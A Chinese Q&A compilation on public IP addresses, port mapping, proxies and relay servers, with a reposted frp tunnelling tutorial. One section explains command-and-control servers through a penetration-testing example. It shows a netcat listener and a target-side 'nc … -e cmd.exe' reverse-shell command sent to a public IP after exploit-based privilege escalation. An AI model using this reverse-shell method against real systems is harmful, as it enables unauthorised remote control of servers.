公网ip中转服务器
Ⅰ 如何让一个公网IP对应两个服务器
使用PAT 端口转发,IP地址后面加端口号。
Ⅱ 如何把公网IP映射到服务器上某一个路径下
到不了某一个路径下。映射是做的端口映射,只能到主机。到路径的话不是映射干的事。你可以在服务器里的WEB服务里做跳转,或者把服务直接指定到那个目录下。102错误的话,你看下你的WEB服务是不是正常,网站设置是不是正常。
Ⅲ 什么是C&C服务器
C&C
服务器的全称是
Command
and
Control
Server,翻译过来就是命令和控制服务器
通常在做渗透测试的时候,在拿到一个
webshell
的时候,需要对服务器进行提权操作,如果是一台
windows
的服务器,提权的时候通常是利用本地提权漏洞的
exp
进行溢出提权,有些
exp
可以直接在后面加参数,溢出成功之后执行参数中的命令。
而有的
exp
溢出成功之后是返回一个
system
权限的
cmd,这时就需要将低权限的
cmd
shell
反弹回本地,这里用
nc
在本地执行:nc
-vv
-lp
3333
上述命令的意思是在本地监听一个
3333
端口等待连接,假设电脑
IP
是公网的,并且
IP
为
114.114.114.114,然后在目标服务器就可以执行:nc
114.114.114.114
3333
-e
cmd.exe
上面的命令就可以把远程服务器的服务器权限的
cmd
shell
返回到本地,这时你就可以通过
nc
建立的这个
shell
进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的
C&C
服务器。
(3)公网ip中转服务器扩展阅读:
C&C
服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。
通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网
IP
地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。
这里中转服务器的作用就是本地内网的主机监听的端口映射到公网
IP
的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。
Ⅳ 如何通过公网IP经过防火墙访问内网服务器
1、首先登录防火墙后台,找的源nat选项新建一条源NAT策略。
Ⅳ 公网IP能不通过任何设备直接分配给服务器吗
当然能,直接连接或一个交换设备就可以了.
这么接的话,这台机器所有的端口完全暴露在公网上,系统安全要经得起考验才可以.
Ⅵ IP转换器什么意思。有什么作用
IP转换器形象的说:它是网络信息的中转站。代理服务器就好象一个大的Cache,这样就能显着提高浏览速度和效率。更重要的是:Proxy Server(代理服务器)是Internet链路级网关所提供的一种重要的安全功能。
其他功能:
1.设置用户验证和记账的功能.它可以根据用户的需求进行记账,没有登记的用户会无权通过代理服务器访问Internet网,并且可以对用户的访问时间、访问地点、信息流量等等信息进行统计。
2.能够对用户进行分级管理,设置不同的访问权限,也可以对外界或者内部的Internet地址进行筛选过滤,设置访问权限。
3.增加了缓冲器(Cache),提高访问速度.对经常访问的网站会创建一个缓冲区,大大提高了网站访问的效率,减少了缓冲的时间.通常的代理服务器都会设置一个较大的硬盘缓冲区,每当有外界信息通过的时候,都会将其保存在缓冲区中,懂其他的用户再次访问的时候,则直接会有缓冲区将信息提出,传给用户,以提高访问速度。
4.连接内网与Internet,充当防火墙(Firewall).正因为所有的用户都是通过代理服务器访问外界的网络,只映射为一个IP地址,所以外界并不能直接访问到用户本身的网络上来.同时也可以设置对于IP地址的过滤,限制内部网对外部的访问限制。
5.节省IP资源.代理服务器可以允许使用大量的伪IP地址,节约网上资源,也就是说代理服务器可以减少对IP地址的需求.对于使用局域网方式接入Internet ,如果为局域网(LAN)内的每一个用户都申请一个IP地址,其费用可想而知.但使用代理服务器后,只需代理服务器上有一个合法的IP地址,LAN内其他用户可以使用10.*.*.*这样的私有IP地址,这样可以节约大量的IP,降低了网络的维护成本。
6.代理服务器的另外一个好处就是可以通过IP管理网络的资源,限制部分网络资源进入特定的区域的用户,能够保护资源的地域性。
Ⅶ 如何把公网IP映射到服务器上
满意答案什么名不是名9级2010-04-141.如果是服务器直接设置的公网ip,那就最简单了,开放一个远程权限给对方就好了,建议服务器里面加防火墙指定下对方哪些ip可以远程操控---但是这样肯定是极不安全的,尤其还是win服务器2.如果中间接了路由,那就是首先开放远程权限,然后把内网这台服务器的IP加远程用到的端口映射到路由上就好了,建议服务器里面加防火墙指定下对方哪些ip可以远程操控 追问: 非常感谢,我再问下1.开放一个远程权限在哪开? 回答: 1.这个远程服务是你设定的,你如果用系统自带的也可以,端口是3389的远程桌面2.是端口映射,应该是在转发{NAT这个}里面设置 追问: 非常3Q SOSO用户 的感言: 3Q 2010-04-14
Ⅷ 怎么利用一个公网IP做个网站服务器啊
有公网IP,就简单了。直接安装IIS,将默认站点指向的主目录改成别的文件夹,然后将网站程序放到站点对应的文件夹下,设置好网站程序,别人就能用你电脑的IP访问你的网站了。
Ⅸ 如何让内网的CENTOS服务器能用域名访问
利用frp穿透技术,来实现你要的功能,不需要公网IP。毕竟现在公网IP运营商有很多限制:
以下文章转载自吴昊博客
frp内网穿透是通过一个带有公网IP的服务器进行中转,对被控主机实现反向代理,用户通过访问frps(中转服务器)来实现对frpc(被控主机)的远程访问。
frp流程图如下:
frp项目地址:https://github.com/fatedier/frp
本实验环境以阿里云服务器作为中转机,中转服务器使用Centos7.6,被控主机使用Centos7.6,用户使用Windows10由于网络原因,文中链接已经替换成了本地链接,如不放心,请自行去GitHub下载
frps中转服务器配置
1、下载frp
在一台有公网IP的主机上配置frps,我这里以阿里云Centos7.x主机为例
1 wget http://down.whsir.com/downloads/frp_0.27.0_linux_amd64.tar.gz
2 tar xf frp_0.27.0_linux_amd64.tar.gz
3 mv frp_0.27.0_linux_amd64 /usr/local
4 cd /usr/local/frp_0.27.0_linux_amd64
5 rm -f frpc*
2、配置frps
这里使用最基础的配置,bind_port 表示frp面板的监控端口,dashboard_user表示面板的登陆帐号,dashboard_pwd表示面板的登陆密码,其它不动。
1 vi
frps.ini
配置文件说明:
1 [common]
2 bind_port = 7000
3
4 dashboard_user = whsir
5 dashboard_pwd = blog.whsir.com
6 dashboard_port = 8000
3、启动frps
配置启动服务
1 vi /etc/systemd/system/frps.service
1 [Unit]
2 Description=frps daemon
3 After=syslog.target network.target
4 Wants=network.target
5
6 [Service]
7 Type=simple
8 ExecStart=/usr/local/frp_0.27.0_linux_amd64/frps -c /usr/local/frp_0.27.0_linux_amd64/frps.ini
9
10 [Install]
11 WantedBy=multi-user.target
技行以下两个命令
1 systemctl enable frps
2 systemctl start frps
4、访问监控平台
http://公网IP:8000
账号whsir
密码blog.whsir.com
如果访问不了,请使用ss -lnt命令检查端口是否启动,是否因为防火墙原因拦截。
至此frps中转服务器配置完成
frpc内网主机配置
1、内网主机下载frp
1 wget http://down.whsir.com/downloads/frp_0.27.0_linux_amd64.tar.gz
2 tar xf frp_0.27.0_linux_amd64.tar.gz
3 mv frp_0.27.0_linux_amd64 /usr/local
4 cd /usr/local/frp_0.27.0_linux_amd64
5 rm -f frps*
2、配置frpc
其中x.x.x.x表示frps中转服务器IP地址
ssh字段:local_port = 22示被控(内网)主机的ssh端口,remote_port = 6000表示ssh中转端口
web字段:local_port = 80表示被控(内网)主机的web端口,remote_port = 8081表示web中转端口
1 vi frpc.ini
1 [common]
2 server_addr = x.x.x.x
3 server_port = 7000
4
5 [ssh]
6 type = tcp
7 local_ip = 127.0.0.1
8 local_port = 22
9 remote_port = 6000
10
11 [web]
12 type = tcp
13 local_ip = 127.0.0.1
14 local_port = 80
15 remote_port = 8081
3、启动frpc
配置启动服务
1 vi /etc/systemd/system/frpc.service
1 [Unit]
2 Description=frpc daemon
3 After=syslog.target network.target
4 Wants=network.target
5
6 [Service]
7 Type=simple
8 ExecStart=/usr/local/frp_0.27.0_linux_amd64/frpc -c /usr/local/frp_0.27.0_linux_amd64/frpc.ini
9
10 [Install]
11 WantedBy=multi-user.target
执行如下命令
1 systemctl enable frpc
2 systemctl start frpc
至此frpc被控主机配置完成
此时可通过x.x.x.x:6000连接内网ssh,通过http://x.x.x.x:8081访问内网主机web,访问速度取决于带宽
这时候,内网主机就映射到外网去了,然后,用域名指定你的frp主机ip就可以了。这样就可以实现你的功能了。
Ⅹ ip 中的,内网,外网,公网,dcn网络,分别是什么意思
ip中的,内网,外网,公网,dcn网络,分别是:
1、内网ip:
内网也就是局域网,内网的计算机以NAT协议,通过一个公共的网关访问Internet。内网的计算机可向Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。
2、外网IP:
外网IP指的是:打开ADSL路由功能的用户你的外网IP就应该是ADSL设备的IP,网吧里的外网IP是指整个网吧的主IP,校园网的外网IP就是整个校园网的那个主IP,小区网的外网IP与校园网同理。
3、公网IP:
广域网IP是指以公网连接Internet上的非保留地址。广域网、局域网是两种Internet的接入方式,广域网的计算机和Internet上的其他计算机可随意互相访问。
4、dcn网络:
DCN是一种支持网络七层协议栈中第一层、第二层和第三层功能的网络,主要承载管理信息和分布式信令消息。在公用数据通信网中有电路交换、分组交换和租用电路三种形式的数据传输业务。
(10)公网ip中转服务器扩展阅读:
所谓没有公网ip,就是说机子并非直接连接上internet,而是所有通讯经过一台代理进行中转,这时候问题就来了,就会有一些通讯无法在这种机制下顺利进行。
比如两个网吧之间,网吧的机子是没有公网 ip的典型例子,通常两个网吧之间通过QQ传送文件就不是直接两台机器建立连接传输的,而是通过QQ的公网服务器进行中转传输了。
又比如没有公网ip,上网玩对战游戏通常会有问题,你建立的游戏别人无法加入等等,当然通过服务提供商的公网服务器中转还是可以达成两个没有公网IP的机器进行交流的。